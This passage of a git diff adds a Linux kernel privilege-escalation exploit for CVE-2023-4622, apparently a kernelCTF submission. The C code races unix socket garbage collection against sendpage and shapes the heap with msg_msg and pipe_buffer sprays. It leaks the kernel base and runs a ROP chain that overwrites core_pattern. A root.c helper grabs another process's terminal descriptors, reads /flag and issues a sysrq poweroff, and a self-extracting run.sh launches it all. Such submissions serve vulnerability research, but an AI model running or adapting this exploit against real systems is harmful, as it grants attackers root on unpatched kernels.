build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop) +{ + *(size_t *)&rop[0x8] = POP_RDI; + *(size_t *)&rop[0x18] = POP_RSP; + *(size_t *)&rop[0x20] = rop_addr + START_ROP; + +#ifdef LTS + *(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops + *(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release + *(size_t*)&rop[0x2e] = PIVOT2; +#else + *(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops + *(size_t *)&rop[0x28] = PIVOT; //set pipe_buf_operations.release + *(size_t *)&rop[0x39] = PIVOT2; +#endif + + int i = 0; + // copy_from_user(core_pattern, user_buf, sizeof(user_buf); + ROP(i++) = POP_RDI; + ROP(i++) = CORE_PATTERN; + ROP(i++) = POP_RSI2; + ROP(i++) = (size_t)&user_buf; + ROP(i++) = POP_RDX; + ROP(i++) = sizeof(user_buf); + ROP(i++) = COPY_FROM_USER; + // msleep(0x10000); + ROP(i++) = POP_RDI; + ROP(i++) = 0x10000; + ROP(i++) = MSLEEP; +} + +int corrupted_msg() +{ + int corrupted_q = 0; + int corrupted_type = 0; + int victim_q, victim_type = 0; + for (int i = 0; i < NUM_QUEUE; i++) + { + int tmp_mtype = 0; + for (int j = 0; j < NUM_MSG; j++) + { + if (msgrcv(msqid[i], &msg, MSG_SIZE, j, MSG_COPY | IPC_NOWAIT) < 0) + { + break; + } + // check if msg is corrupted + if (msg.mtype - 1 != tmp_mtype || *(size_t *)&msg.mtext[0] != i) + { + corrupted_q = i; // corrupted msg queue + corrupted_type = tmp_mtype; // corrupted msg index/type identifier + victim_q = *(size_t *)&msg.mtext[0]; // victim msg queue + victim_type = msg.mtype; // victim msg index/type identifier + // Now we have `msqid[corrupted_q]` with mtype corrupted_type point the same msg + // at msqid[victim_q] with mtype `victim_type` + goto done; + } + tmp_mtype = msg.mtype; + } + } +done: + if (corrupted_type) + { + printf("corrupted_q: %d\n", corrupted_q); + printf("corrupted_type: %d\n", corrupted_type); + printf("victim_q: %d\n", victim_q); + printf("victim_type: %d\n", victim_type); + // delete msg at victim_q with mtype victim_type + msgrcv(msqid[victim_q], &msg, MSG_SIZE, victim_type, IPC_NOWAIT); // this deleted msg can still accessed by corrupted_q with corrupted_type (msg UAF) + + // prepare corrupted msg_msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future) + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x200; // fake msg.m_ts (for leak kernel address via buffer overread) + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next + ((size_t *)&msg.mtext[0x1000 - 0x30])[4] = 0; // msg.security + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 1; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg + msg.mtype = 2; + SYSCHK(msgsnd(hackq[j], &msg, 0x200, 0)); // send rop payload here later [1] + } + // msgrcv on corrupted msg for leaking what msg adjacent with this corrupted msg + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT)); + int victim2_q = *(size_t *)&msg.mtext[0x80]; + int victim2_type = *(size_t *)&msg.mtext[0x60]; + printf("victim2_q: %d\n", victim2_q); // adjacent corrupted msg queue identifier + printf("victim2_type: %d\n", victim2_type); // adjacent corrupted msg m_type identifier + msgrcv(msqid[victim2_q], &msg, MSG_SIZE, victim2_type, IPC_NOWAIT); // free the adjacent msg + + // reallocate adjacent msg with another msg that contain kmalloc-1024 heap address + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + msg.mtype = 3; + *(size_t *)&msg.mtext[0] = j; + SYSCHK(msgsnd(hackq[j], &msg, MSG_SIZE, 0)); // replace the adjacent msg + msg.mtype = 4; + SYSCHK(msgsnd(hackq[j], &msg, 0x400 - 0x30, 0)); // fill adjacent msg.next with kmalloc-1024 + } + + // msgrcv on corrupted msg for leaking known heap address + // msg.prev is prepared rop memory allocated at [1] + // msg.next is another heap memory that will be replaced with pipe_buffer later + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT)); + size_t known_addr_pipe = *(size_t *)&msg.mtext[0x50]; // adjacent msg msg.m_prev + size_t known_addr_rop = *(size_t *)&msg.mtext[0x58]; // adjacent msg msg.m_next + int victim3_q = *(size_t *)&msg.mtext[0x80]; // get msg queue identifier from adjacent msg + int victim4_q = *(size_t *)&msg.mtext[0x0]; // get msg queue identifier from msg + printf("known_addr_rop 0x%lx\n", known_addr_rop); // rop payload address + printf("known_addr_pipe 0x%lx\n", known_addr_pipe); // pipe_buffer address + printf("victim3_q: %d\n", victim3_q); + printf("victim4_q: %d\n", victim4_q); + // delete msg that will replaced with pipe_buffer + SYSCHK(msgrcv(hackq[victim3_q], &msg, 0x400 - 0x30, 4, IPC_NOWAIT)); + // replace the deleted msg with pipe_buffer + for (int i = 0; i < 0xf0; i++) + { + //printf("%p\n",i); + SYSCHK(pipe(spray_pipe2[i])); + SYSCHK(write(spray_pipe2[i][1], "pwn", 3)); + } + + // delete the msg (that used to build fake msg) + SYSCHK(msgrcv(hackq[victim4_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 1, IPC_NOWAIT)); + + // prepare for the second fake msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future) + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x1000 - 0x30 + 0x400 - 0x8; // fake msg.m_ts + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = known_addr_pipe - 0x10; // fake msg.next for leak anon_pipe_buf_ops + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 5; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg + } + + // receive corrupted msg + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x1000 - 0x30 + 0x400 - 0x8, corrupted_type, MSG_COPY | IPC_NOWAIT)); + int victim5_q = *(size_t *)&msg.mtext[0x0]; // msg queue identifier + printf("victim5_q: %d\n", victim5_q); + size_t anon_pipe_buf = *(size_t *)&msg.mtext[0x1000 - 0x30 + 0x20 - 8]; // anon_pipe_buf_ops address + printf("anon_pipe_buf 0x%lx\n", anon_pipe_buf); + KERNEL_BASE = anon_pipe_buf - ANON_PIPE_BUF_OPS_OFF; // leak kernel base + printf("fixing kernel base to 0x%lx\n", KERNEL_BASE); + + // delete the corrupted msg that contain fake msg data for rebuild another fake msg + SYSCHK(msgrcv(hackq[victim5_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT)); + + // rebuild fake msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISION2 + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = MSG_SIZE; // fake msg.m_ts + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next + ((size_t *)&msg.mtext[0x1000 - 0x30])[4] = known_addr_pipe; // fake msg.security (for arbitrary free on pipe_buffer) + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 1; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // overwrite stale msg with fake msg + } + + // free up the msg quota + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + if (j != victim5_q) // make sure we didn't mess up with the corrupted queue + SYSCHK(msgrcv(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT)); + } + + // delete the fake msg, this will perform arbitrary free on pipe_buffer + SYSCHK(msgrcv(msqid[corrupted_q], &msg, MSG_SIZE, 0x1337, IPC_NOWAIT)); + + // prepare fake pipe_buffer and rop payload + msg.mtype = 6; + build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]); + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + // overwrite pipe_buffer + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x400 - 8, IPC_NOWAIT)); + } + + // trigger RIP control + for (int i = 0; i < 0xf0; i++) + { + close(spray_pipe2[i][0]); + close(spray_pipe2[i][1]); + } + + return 1; + } + return 0; +} + +void set_cpu(int i); + +void *trigger_unix_stream_sendpage(void *x) +{ + set_cpu(0); + // setup a certain timeout nanosecond + struct itimerspec new = {.it_value.tv_nsec = timeout}; + // Send signal to trigger_unix_gc_thread + write(sync_job[1], "H", 1); + SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL)); + splice(datapipe[0], 0, A, 0, 0x1000, 0); + close(datapipe[0]); + return NULL; +} + +void *trigger_unix_gc_thread(void *x) +{ + set_cpu(1); + int s = socket(AF_UNIX, SOCK_STREAM, 0); + read(sync_job[0], &x, 1); + // Release a unix socket will trigger unix_gc + close(s); + return NULL; +} + +void *spray_pipe_page_thread(void *x) +{ + set_cpu(1); + // After unix_gc clean skb, this thread will wakeup and start spray pipe page. + read(signalpipe[0], buf, 1); + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + write(spray_pipe[i][1], spray_data, 0x1000); + + return NULL; +} + +static void epoll_ctl_add(int epfd, int fd, uint32_t events) +{ + struct epoll_event ev; + ev.events = events; + ev.data.fd = fd; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +void set_cpu(int i) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void do_epoll_enqueue(int fd) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < 0x4; k++) + { + if (fork() == 0) + { + for (int i = 0; i < 0x100; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xc0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xc0; i++) + { + for (int j = 0; j < 0x100; j++) + { + // queue as many as possible async waiters at timerfd waitqueue + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + *(size_t *)0 = 0; +} + +int main(int argc, char **argv) +{ + size_t start_time = time(NULL); + setvbuf(stdout, 0, 2, 0); + //leak(); + printf("POP_RDI @ 0x%lx\n", POP_RDI); + printf("POP_RDX @ 0x%lx\n", POP_RDX); + printf("POP_RSI @ 0x%lx\n", POP_RSI); + printf("POP_RSP @ 0x%lx\n", POP_RSP); + printf("POP_RSI2 @ 0x%lx\n", POP_RSI2); + printf("PIVOT @ 0x%lx\n", PIVOT); + printf("PIVOT2 @ 0x%lx\n", PIVOT2); + printf("PIVOT3 @ 0x%lx\n", PIVOT3); + signal(SIGPIPE, SIG_IGN); + + if (fork() == 0) + { + set_cpu(1); + strcpy(argv[0], "billy"); + while (1) + sleep(1); + } + if (fork() == 0) + { + set_cpu(1); + setsid(); + crash(""); + } + + struct rlimit rlim = { + .rlim_cur = 0xf000, + .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + // init a timerfd for extend the race windows + tfd = timerfd_create(CLOCK_MONOTONIC, 0); + // Do extend race windows stuff + do_epoll_enqueue(tfd); + pipe(sync_job); + setup_msg(); + printf("setup head to 0x%lx\n", PHYS_ADDR_MSG); + // Prepare spray data for reallocate freed skb as pipe page data. + // Craft skb->head and skb->end to control skb_shinfo pointer + for (int i = 0; i < 0x10; i++) + { + *(size_t *)&spray_data[i * 0x100 + 0xc0] = PHYS_ADDR_MSG; // skb->head + *(int *)&spray_data[i * 0x100 + 0xbc] = 0x42; // skb->end + } + + for (int i = 0; i < 0x100; i++) + SYSCHK(pipe(spray_pipe[i])); + + // prepare a template msg for send unix socket to peer + struct msghdr msg = {}; + struct iovec iov[] = {{.iov_base = data, .iov_len = 5}}; + msg.msg_iov = iov; + msg.msg_iovlen = 1; + struct cmsghdr *cmsg; + int len = CMSG_LEN(sizeof(int)); + cmsg = (struct cmsghdr *)calloc(0x10, len); // prepare larger enough chunck + cmsg->cmsg_len = len; + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + msg.msg_control = cmsg; + msg.msg_controllen = len; + set_cpu(1); + + if (fork() == 0) + { + while (1) + { + // Try every different timeout seconds for timerfd to expire. + // Hope it will hit our ideal scenario in thousands of tries + if ((timeout & 0xff) == 0) + { + printf("0x%lx\n", timeout); + // We check msg_msg->m_list->next is modified due to our UAF write every 0x100 tries + if (corrupted_msg()) + break; + } + // rollback to smallest timeout to make timeout always in short time. + if ((timeout & 0xfff) == 0) + { + timeout = 200; + if( (time(NULL)-start_time)>(30*60) ) + exit(-1); + } + timeout++; + + // prepare a signal like pipe and make spray_pipe_page_thread read on it + // When peer pipe has be closed by unix_gc, spray_pipe_page_thread will wake up and start spray + pipe(signalpipe); + pthread_t spray_thread; + pthread_create(&spray_thread, 0, spray_pipe_page_thread, 0); + + // prepare a data pipe for us to call unix_stream_sendpage only. + pipe(datapipe); + write(datapipe[1], data, 0x1000); + + // Prepare unix socket refcount circle + // A <-> B + // C <-> D + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + A = fds[0]; + B = fds[1]; + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + C = fds[0]; + D = fds[1]; + + // Max the socket send/recv buffer, because we need to spray a certain number skb + // For heap cross cache attack + size_t val = 0x400000; + SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4))); + + // Spray a lot skb a head for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // Make B's recv buffer hold C, datapipe and signalpipe refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3); + msg.msg_controllen = cmsg->cmsg_len; + ((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; //when release this file, spray_pipe_page_thread will wake up when CPU#1 has free cpu time. + ((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when release this file, because pipe lock is hold in splice, it will sleep and let CPU#1 to context switch + ((int *)CMSG_DATA(cmsg))[2] = C; + SYSCHK(sendmsg(A, &msg, 0)); + + // decrease unnecessary refcount + close(signalpipe[1]); + close(datapipe[1]); + + // Make C's recv buffer hold B refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int)); + msg.msg_controllen = cmsg->cmsg_len; + *(int *)CMSG_DATA(cmsg) = B; + SYSCHK(sendmsg(D, &msg, 0)); + + // Spray a lot skb at tail for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // decrease unnecessary refcount + close(B); + close(C); + + // A real round for race + pthread_t tid[2]; + pthread_create(&tid[1], NULL, trigger_unix_gc_thread, NULL); + pthread_create(&tid[0], NULL, trigger_unix_stream_sendpage, NULL); + pthread_join(tid[1], NULL); + pthread_join(tid[0], NULL); + pthread_join(spray_thread, NULL); + + // Release pipe page for next round + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + read(spray_pipe[i][0], buf, 0x1000); + + // Cleanup for next round + close(A); + close(D); + close(signalpipe[0]); + } + exit(0); + } + wait(NULL); + // Never return after success + while (1) + sleep(1); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz new file mode 100644 index 00000000..0a70b43d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root new file mode 100755 index 00000000..7f12d887 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c new file mode 100644 index 00000000..95476547 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c @@ -0,0 +1,41 @@ + +#define _GNU_SOURCE /* See feature_test_macros(7) */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYS_pidfd_getfd 438 +char buf[0x100]; +char path[0x100]; +int res; +int fd; +int port; +char* ip; +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + system("cat /flag;echo o>/proc/sysrq-trigger"); + + +} +int main(int argc,char** argv){ + job(0); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh new file mode 100755 index 00000000..40937bd1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh @@ -0,0 +1,6 @@ +#!/bin/sh +dd if=$0 of=/tmp/exp.tar.gz skip=1 +cd /tmp +tar -xf exp.tar.gz +./poc +exit diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json new file mode 100644 index 00000000..6d714afb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp95" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y&id=790c2f9d15b594350ae9bca7b236f2b1859de02c", + "cve":"CVE-2023-4622", + "affected_versions":[ + "4.2 - 6.4" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + ], + "kernel_config":[ + "CONFIG_UNIX" + ] + } + }, + "exploits": { + "cos-105-17412.101.42": { + "uses":[ + ], + "requires_separate_kaslr_leak": true, + "stability_notes":"1 ~ 2 times success per 10 times run" + } + } + } diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz new file mode 100644 index 00000000..d6585662 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz differ